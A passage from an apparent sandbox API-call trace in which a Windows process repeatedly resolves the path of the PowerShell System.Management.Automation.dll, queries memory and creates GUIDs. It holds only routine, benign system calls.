lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.665] GetLastError () returned 0x0 [0076.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.666] GetLastError () returned 0x0 [0076.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.666] GetLastError () returned 0x0 [0076.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.666] GetLastError () returned 0x0 [0076.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.666] GetLastError () returned 0x0 [0076.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.666] GetLastError () returned 0x0 [0076.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.666] GetLastError () returned 0x0 [0076.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.666] GetLastError () returned 0x0 [0076.666] VirtualQuery (in: lpAddress=0xacf64, lpBuffer=0xadf64, dwLength=0x1c | out: lpBuffer=0xadf64*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad958, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.666] GetLastError () returned 0x0 [0076.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.667] GetLastError () returned 0x0 [0076.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.667] GetLastError () returned 0x0 [0076.667] VirtualQuery (in: lpAddress=0xacf64, lpBuffer=0xadf64, dwLength=0x1c | out: lpBuffer=0xadf64*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.667] GetLastError () returned 0x0 [0076.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.667] GetLastError () returned 0x0 [0076.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.667] GetLastError () returned 0x0 [0076.667] VirtualQuery (in: lpAddress=0xacb94, lpBuffer=0xadb94, dwLength=0x1c | out: lpBuffer=0xadb94*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.667] VirtualQuery (in: lpAddress=0xacbd0, lpBuffer=0xadbd0, dwLength=0x1c | out: lpBuffer=0xadbd0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.668] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.668] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.668] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.668] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.668] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.668] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.669] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.669] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.669] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.669] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.669] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.669] VirtualQuery (in: lpAddress=0xacd3c, lpBuffer=0xadd3c, dwLength=0x1c | out: lpBuffer=0xadd3c*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.669] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.670] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.670] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.670] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.670] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x9245c1f9, Data2=0xbe9a, Data3=0x4b7a, Data4=([0]=0xaf, [1]=0x6f, [2]=0x70, [3]=0x86, [4]=0x45, [5]=0x48, [6]=0xc6, [7]=0x8a))) returned 0x0 [0076.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.670] GetLastError () returned 0x0 [0076.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.670] GetLastError () returned 0x0 [0076.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.670] GetLastError () returned 0x0 [0076.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.671] GetLastError () returned 0x0 [0076.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.671] GetLastError () returned 0x0 [0076.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.671] GetLastError () returned 0x0 [0076.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.671] GetLastError () returned 0x0 [0076.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.671] GetLastError () returned 0x0 [0076.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.671] GetLastError () returned 0x0 [0076.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.671] GetLastError () returned 0x0 [0076.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.671] GetLastError () returned 0x0 [0076.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.671] GetLastError () returned 0x0 [0076.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.672] GetLastError () returned 0x0 [0076.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.672] GetLastError () returned 0x0 [0076.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.672] GetLastError () returned 0x0 [0076.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.672] GetLastError () returned 0x0 [0076.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.672] GetLastError () returned 0x0 [0076.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.672] GetLastError () returned 0x0 [0076.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.672] GetLastError () returned 0x0 [0076.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.672] GetLastError () returned 0x0 [0076.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.672] GetLastError () returned 0x0 [0076.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.672] GetLastError () returned 0x0 [0076.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.673] GetLastError () returned 0x0 [0076.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.673] GetLastError () returned 0x0 [0076.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.673] GetLastError () returned 0x0 [0076.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.673] GetLastError () returned 0x0 [0076.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.673] GetLastError () returned 0x0 [0076.673] VirtualQuery (in: lpAddress=0xacb94, lpBuffer=0xadb94, dwLength=0x1c | out: lpBuffer=0xadb94*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.673] VirtualQuery (in: lpAddress=0xacbd0, lpBuffer=0xadbd0, dwLength=0x1c | out: lpBuffer=0xadbd0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad984, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.674] GetLastError () returned 0x0 [0076.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.674] GetLastError () returned 0x0 [0076.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.674] GetLastError () returned 0x0 [0076.674] VirtualQuery (in: lpAddress=0xacc9c, lpBuffer=0xadc9c, dwLength=0x1c | out: lpBuffer=0xadc9c*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad984, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.674] GetLastError () returned 0x0 [0076.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.674] GetLastError () returned 0x0 [0076.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.674] GetLastError () returned 0x0 [0076.675] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xaaceb473, Data2=0xb66a, Data3=0x46fc, Data4=([0]=0xba, [1]=0x8f, [2]=0xec, [3]=0xad, [4]=0xe6, [5]=0x1, [6]=0xbf, [7]=0x23))) returned 0x0 [0076.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.675] GetLastError () returned 0x0 [0076.675] GetFullPathNameW (in: 